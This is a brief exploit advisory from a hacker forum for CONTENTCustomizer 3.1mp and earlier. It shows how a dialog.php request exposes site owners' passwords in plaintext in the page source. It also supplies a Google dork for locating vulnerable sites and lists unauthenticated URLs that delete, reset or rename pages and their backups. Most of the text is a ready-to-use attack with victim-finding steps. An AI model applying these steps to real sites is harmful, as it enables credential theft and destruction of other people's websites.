CONTENTCustomizer versions 3.1mp and below suffer from a login credential disclosure vulnerability.
02db435ae8cbe20cb7d9b25eeec023f923ce576ff5004f2a72e90b3f380a9a1f
CONTENTCustomizer <= v 3.1mp Login Credentials Disclosure Vulnerability
---------------------------------------
Author: d3hydr8
Homepage: darkc0de.com
Original Post: forum.darkc0de.com
---------------------------------------
Software: CONTENTCustomizer
Homepage: contentcustomizer.net
Version: <= v 3.1mp
Vuln Page: /dialog.php?action=editauthor&doc='+pagename
Method: Find a site using ContentCustomizer, get a page name you want to
edit. (index.php)
Fill it in with our Vuln Page "
http://example.com/generator/dialog.php?action=editauthor&doc=index.php"
In the form you will see the Username: (owner of the file) but the password
is in asterisk's, View Source
The password will be in the value= field in plaintext.
<td nowrap><input type=password name=newlocalpassword value="PASSWORD"
id=newlocalpassword style="width:160px;"></td>
Trick: Hit Ctrl+Y on a page that ContentCustomizer controls and it brings
you to the login screen ;)
Dork: inurl:"generator/default.php?doc="
Other fun stuff:
dialog.php?action=del&doc='+pagename // Delete
dialog.php?action=delbackup&doc='+pagename // Delete Backup
dialog.php?action=res&doc='+pagename // Reset
dialog.php?action=ren&doc='+pagename // Rename